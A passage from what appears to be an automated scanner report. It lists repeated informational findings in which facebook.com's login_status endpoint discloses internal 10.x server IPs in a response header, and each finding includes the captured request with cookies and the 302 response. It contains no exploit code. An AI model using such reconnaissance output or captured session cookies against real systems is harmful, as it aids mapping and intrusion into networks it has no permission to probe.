Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2f94026b8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff108e0ea74&relation=parent&transport=postmessage&frame=f2a59c0a7
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.184.77
X-Cnection: close
Date: Thu, 05 May 2011 02:12:17 GMT
Content-Length: 0

20.67. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.185.67

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9f2b9a3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1853bb678%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe1c606f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfff1bc7e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a034a798%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fff1bc7e8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3025efcb8&relation=parent&transport=postmessage&frame=f3ce7949c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.185.67
X-Cnection: close
Date: Thu, 05 May 2011 02:10:56 GMT
Content-Length: 0

20.68. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.92.95

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113f3a634%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcdd5d89%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3eb37e814%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffe4095ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27e2a5944%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ffe4095ec&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2c97d5318&relation=parent&transport=postmessage&frame=f7bf85e88
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.92.95
X-Cnection: close
Date: Thu, 05 May 2011 01:51:41 GMT
Content-Length: 0

20.69. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.148.108

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d9658e4c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ddf9738%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9162ab08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df354a717f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df249469b68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f354a717f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff26ab733ac&relation=parent&transport=postmessage&frame=f30563d68
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.148.108
X-Cnection: close
Date: Thu, 05 May 2011 02:02:37 GMT
Content-Length: 0

20.70. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.83.59

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ec768578%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f516ad28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff5c1a2b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16188477c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20b6aeebc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f16188477c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff33414522&relation=parent&transport=postmessage&frame=f109862054
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.83.59
X-Cnection: close
Date: Thu, 05 May 2011 01:40:23 GMT
Content-Length: 0

20.71. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c71de2bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1aa1cd374%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c5aef88%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25323c354%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23a2a205c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f25323c354&origin=http%3A%2F%2Faol.sportingnews.com%2Ff126b06d1&relation=parent&transport=postmessage&frame=f21bd052
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.191.38
X-Cnection: close
Date: Thu, 05 May 2011 01:22:17 GMT
Content-Length: 0

20.72. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.171.52

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28ef43e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df119f53988%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df221f991c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e79ca694%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f2f69a18%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3e79ca694&origin=http%3A%2F%2Faol.sportingnews.com%2Ff22eb03b04&relation=parent&transport=postmessage&frame=fd650a0cc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.52
X-Cnection: close
Date: Thu, 05 May 2011 01:23:52 GMT
Content-Length: 0

20.73. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.209.50

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a54b7dd8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df93203eb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c35f89d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f3c0160%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df88c7529%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3f3c0160&origin=http%3A%2F%2Faol.sportingnews.com%2Ff19c6b646&relation=parent&transport=postmessage&frame=f3ad5ca5b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.209.50
X-Cnection: close
Date: Thu, 05 May 2011 01:29:11 GMT
Content-Length: 0

20.74. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.60.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10c9d7c34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8d8d5e7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8723fba8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d1666efc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6e3d0dc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d1666efc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2af41353&relation=parent&transport=postmessage&frame=f27955bdf4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.60.49
X-Cnection: close
Date: Thu, 05 May 2011 01:41:45 GMT
Content-Length: 0

20.75. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.205.57

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16d2a7e14%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f63feb74%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df268a5a288%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d9db1fc8%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13573f778%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1d9db1fc8&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff30d654d68&relation=parent&transport=postmessage&frame=f1357ef214
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.57
X-Cnection: close
Date: Thu, 05 May 2011 01:28:42 GMT
Content-Length: 0

20.76. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

